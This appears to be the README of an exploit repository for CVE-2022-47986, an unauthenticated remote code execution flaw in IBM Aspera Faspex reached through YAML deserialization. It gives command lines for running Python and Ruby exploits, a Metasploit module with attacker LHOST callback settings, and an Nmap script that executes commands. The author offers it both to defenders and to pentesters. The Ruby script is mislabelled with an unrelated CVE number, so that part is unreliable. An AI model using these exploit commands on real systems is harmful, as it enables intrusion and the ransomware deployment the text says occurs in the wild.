This vulnerability is exploited in the wild. IceFire uses it to deploy ransomware on targeted systems. I would like to help SOC/Blue teams identify impacted systems, and pentesters/Red teams exploit and report it.
I propose pure Python and Ruby scripts, plus Metasploit and Nmap modules, to exploit the vulnerability, which causes RCE (Remote Code Execution) on IBM Aspera Faspex through YAML deserialization.
python3 CVE-2022-47986.py <target> <command>
# OR
chmod u+x CVE-2022-47986.py
./CVE-2022-47986.py https://aspera.faspax.local id
ruby CVE-2021-31166.rb
ruby CVE-2021-31166.rb <hostname> -c <command>
ruby CVE-2021-31166.rb aspera.faspax.local -c id
msf6 > use exploit/linux/http/ibm_aspera_faspex_rce_yaml_deserialization
msf6 exploit(linux/http/ibm_aspera_faspex_rce_yaml_deserialization) > set RHOST 10.10.10.10
RHOST => 10.10.10.10
msf6 exploit(linux/http/ibm_aspera_faspex_rce_yaml_deserialization) > set LHOST 192.168.77.139
LHOST => 192.168.77.139
msf6 exploit(linux/http/ibm_aspera_faspex_rce_yaml_deserialization) > exploit
nmap -p 443 --script ibm-aspera-faspex-rce 172.17.0.2
nmap -p 443 --script ibm-aspera-faspex-rce --script-args "command=id" 172.17.0.2
- IBM
- nvd.nist.gov
- Blog - Exploit
- thehackernews - exploited by icefire
- thehackernews - CISA KEV catalog
Licensed under the GPL, version 3.